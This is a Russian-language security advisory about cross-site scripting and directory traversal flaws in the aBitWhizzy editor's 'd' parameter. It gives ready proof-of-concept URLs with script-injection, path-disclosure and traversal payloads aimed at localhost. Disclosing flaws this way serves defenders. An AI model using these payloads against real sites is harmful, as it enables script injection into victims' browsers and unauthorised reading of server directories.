Программа: aBitWhizzy

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.

1) Уязвимость существует из-за недостаточной обработки входных данных в параметре «d» сценариями whizzypic.php и whizzery/whizzypic.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings»><SCRIPT>alert(‘XSS’)</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings»><SCRIPT>alert(‘XSS’)</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings»><SCRIPT>alert(‘XSS’)</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings»><SCRIPT>alert(‘XSS’)</SCRIPT>

2) Уязвимость существует из-за недостаточной обработки входных данных в параметре «d» сценариями whizzylink.php, whizzery/whizzylink.php, whizzypic.php и
whizzery/whizzypic.php. Атакующий может выполнить атаки обхода директорий, что позволит ему просмотреть содержимое произвольных директорий на целевой системе.

Примеры:

Раскрытие пути:

http://localhost/abitwhizzy/whizzylink.php?d=’
http://localhost/abitwhizzy/whizzypic.php?d=’
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=’
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=’

Перечисление директорий:

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings



Оставить мнение